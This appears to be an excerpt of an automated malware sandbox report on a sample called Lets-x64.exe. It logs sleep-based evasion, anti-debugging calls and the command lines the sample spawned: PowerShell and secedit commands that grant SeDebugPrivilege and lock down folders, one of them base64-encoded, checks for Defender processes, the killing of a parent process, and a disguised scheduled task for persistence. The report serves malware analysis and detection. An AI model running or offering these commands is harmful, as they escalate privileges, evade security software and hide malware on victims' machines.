Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5304 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6760 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284 Thread sleep count: 4186 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep count: 1660 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268 Thread sleep count: 4623 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1496 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3236 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2520 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 360 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 528 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\Program\iusb3mon.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\Program\iusb3mon.exe Code function: 28_2_06242E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 28_2_06242E2C
Source: C:\ProgramData\Program\iusb3mon.exe Code function: 28_2_062472F5 GetSystemInfo,wsprintfA, 28_2_062472F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe File opened: C:\Users\user\AppData
Source: svchost.exe, 00000021.00000002.4015334766.000001F079E2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: irsetup.exe, 00000002.00000002.4576101821.0000000006185000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWter
Source: irsetup.exe, 00000002.00000002.4576101821.0000000006185000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4576101821.0000000006150000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.4025460149.000001F07F454000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Lets-x64.exe API call chain: ExitProcess graph end node graph_0-3250
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe API call chain: ExitProcess graph end node graph_2-24791
Source: C:\ProgramData\Program\iusb3mon.exe API call chain: ExitProcess graph end node graph_28-35261
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Lets-x64.exe Code function: 0_2_00007FF668853240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF668853240
Source: C:\Users\user\Desktop\Lets-x64.exe Code function: 0_2_00007FF668851908 LoadLibraryA,GetProcAddress,FreeLibrary, 0_2_00007FF668851908
Source: C:\ProgramData\Program\iusb3mon.exe Code function: 28_2_001DDB1C mov ecx, dword ptr fs:[00000030h] 28_2_001DDB1C
Source: C:\ProgramData\Program\iusb3mon.exe Code function: 28_2_001E817A mov eax, dword ptr fs:[00000030h] 28_2_001E817A
Source: C:\ProgramData\Program\iusb3mon.exe Code function: 28_2_04D100CD mov eax, dword ptr fs:[00000030h] 28_2_04D100CD
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe Code function: 2_2_000000018003A8E4 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError, 2_2_000000018003A8E4
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\Lets-x64.exe | Code function: 0_2_00007FF6688542FC SetUnhandledExceptionFilter
                              Source: C:\Users\user\Desktop\Lets-x64.exe | Code function: 0_2_00007FF668853240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                              Source: C:\Users\user\Desktop\Lets-x64.exe | Code function: 0_2_00007FF668852680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018001E0D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018002BB84 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018003A484 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                              Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_001DA8ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                              Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_001D6340 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                              Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_0624D0B0 SetUnhandledExceptionFilter
                              Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_0624D0C2 SetUnhandledExceptionFilter

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exe | Code function: CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe | 28_2_06243C8E
                              Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_06244652 GetModuleFileNameA,ShellExecuteExA,ExitProcess
                              Source: C:\Users\user\Desktop\Lets-x64.exe | Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.*')) -force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.*')) -force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
